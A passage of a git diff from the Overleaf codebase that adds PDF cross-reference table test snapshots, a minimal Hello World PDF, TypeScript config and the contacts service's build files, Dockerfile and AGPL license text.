b/services/clsi/test/unit/js/snapshots/pdfjs/simple_bibliography/XrefTable.json new file mode 100644 index 0000000..e3a2a73 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/simple_bibliography/XrefTable.json @@ -0,0 +1,114 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 37282, + "gen": 0, + "uncompressed": true + }, + { + "offset": 37530, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 971, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1322, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9581, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24286, + "gen": 0, + "uncompressed": true + }, + { + "offset": 36258, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + }, + { + "offset": 12, + "gen": 9 + }, + { + "offset": 12, + "gen": 10 + } + ], + "startXRefTable": 37530 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/subdirectories/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/subdirectories/XrefTable.json new file mode 100644 index 0000000..d789009 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/subdirectories/XrefTable.json @@ -0,0 +1,128 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 48194, + "gen": 0, + "uncompressed": true + }, + { + "offset": 48442, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 699, + "gen": 0, + "uncompressed": true + }, + { + "offset": 749, + "gen": 0, + "uncompressed": true + }, + { + "offset": 878, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1000, + "gen": 0, + "uncompressed": true + }, + { + "offset": 8546, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9072, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10659, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18919, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35129, + "gen": 0, + "uncompressed": true + }, + { + "offset": 47101, + "gen": 0, + "uncompressed": true + }, + { + "offset": 14, + "gen": 0 + }, + { + "offset": 14, + "gen": 1 + }, + { + "offset": 14, + "gen": 2 + }, + { + "offset": 14, + "gen": 3 + }, + { + "offset": 14, + "gen": 4 + }, + { + "offset": 14, + "gen": 5 + }, + { + "offset": 14, + "gen": 6 + }, + { + "offset": 14, + "gen": 7 + }, + { + "offset": 14, + "gen": 8 + }, + { + "offset": 14, + "gen": 9 + }, + { + "offset": 14, + "gen": 10 + }, + { + "offset": 14, + "gen": 11 + } + ], + "startXRefTable": 48442 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/tikz_feynman/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/tikz_feynman/XrefTable.json new file mode 100644 index 0000000..fb9584d --- /dev/null +++ 
b/services/clsi/test/unit/js/snapshots/pdfjs/tikz_feynman/XrefTable.json @@ -0,0 +1,168 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 2924, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3039, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4606, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7754, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7870, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11668, + "gen": 0, + "uncompressed": true + }, + { + "offset": 21077, + "gen": 0, + "uncompressed": true + }, + { + "offset": 28498, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35464, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35699, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 703, + "gen": 0, + "uncompressed": true + }, + { + "offset": 754, + "gen": 0, + "uncompressed": true + }, + { + "offset": 909, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1026, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2161, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18, + "gen": 0 + }, + { + "offset": 18, + "gen": 1 + }, + { + "offset": 18, + "gen": 2 + }, + { + "offset": 18, + "gen": 3 + }, + { + "offset": 18, + "gen": 4 + }, + { + "offset": 18, + "gen": 5 + }, + { + "offset": 18, + "gen": 6 + }, + { + "offset": 18, + "gen": 7 + }, + { + "offset": 18, + "gen": 8 + }, + { + "offset": 18, + "gen": 9 + }, + { + "offset": 18, + "gen": 10 + }, + { + "offset": 18, + "gen": 11 + }, + { + "offset": 18, + "gen": 12 + }, + { + "offset": 18, + "gen": 13 + }, + { + "offset": 18, + "gen": 14 + }, + { + "offset": 18, + "gen": 15 + }, + { + "offset": 18, + "gen": 16 + } + ], + "startXRefTable": 35699 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/xelatex_compiler/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/xelatex_compiler/XrefTable.json new file mode 100644 index 0000000..610f719 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/xelatex_compiler/XrefTable.json @@ -0,0 +1,98 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 8578, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 658, + "gen": 0, + "uncompressed": true + }, + { + "offset": 708, + "gen": 0, + "uncompressed": true + }, + { + "offset": 837, + "gen": 0, + "uncompressed": true + }, + { + "offset": 940, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1191, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1627, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7676, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7784, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7822, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + } + ], + "startXRefTable": 8578 +} \ No newline at end of file diff --git a/services/clsi/tiny.pdf b/services/clsi/tiny.pdf new file mode 100644 index 0000000..1c64181 --- /dev/null +++ b/services/clsi/tiny.pdf @@ 
-0,0 +1,58 @@ +%PDF-1.1 +%¥±ë + +1 0 obj + << /Type /Catalog + /Pages 2 0 R + >> +endobj + +2 0 obj + << /Type /Pages + /Kids [3 0 R] + /Count 1 + /MediaBox [0 0 300 144] + >> +endobj + +3 0 obj + << /Type /Page + /Parent 2 0 R + /Resources + << /Font + << /F1 + << /Type /Font + /Subtype /Type1 + /BaseFont /Times-Roman + >> + >> + >> + /Contents 4 0 R + >> +endobj + +4 0 obj + << /Length 55 >> +stream + BT + /F1 18 Tf + 0 0 Td + (Hello World) Tj + ET +endstream +endobj + +xref +0 5 +0000000000 65535 f +0000000018 00000 n +0000000077 00000 n +0000000178 00000 n +0000000457 00000 n +trailer + << /Root 1 0 R + /Size 5 + >> +startxref +565 +%%EOF diff --git a/services/clsi/tsconfig.json b/services/clsi/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/clsi/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/contacts/.eslintrc b/services/contacts/.eslintrc new file mode 100644 index 0000000..cc68024 --- /dev/null +++ b/services/contacts/.eslintrc @@ -0,0 +1,6 @@ +{ + "parserOptions": { + "ecmaVersion": 2022, + "sourceType": "module" + } +} diff --git a/services/contacts/.gitignore b/services/contacts/.gitignore new file mode 100644 index 0000000..80bac79 --- /dev/null +++ b/services/contacts/.gitignore @@ -0,0 +1,5 @@ +node_modules +forever + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/contacts/.mocharc.json b/services/contacts/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/contacts/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/contacts/.nvmrc b/services/contacts/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/contacts/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/contacts/Dockerfile b/services/contacts/Dockerfile new file mode 100644 index 0000000..69d2d35 --- /dev/null +++ b/services/contacts/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/contacts + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/contacts/package.json /overleaf/services/contacts/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/contacts/ /overleaf/services/contacts/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/contacts/LICENSE b/services/contacts/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/contacts/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. 
+ + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. 
+ + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. 
This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. 
This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. 
+ + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. 
+ + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. 
+ + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. 
+ + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. 
If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 
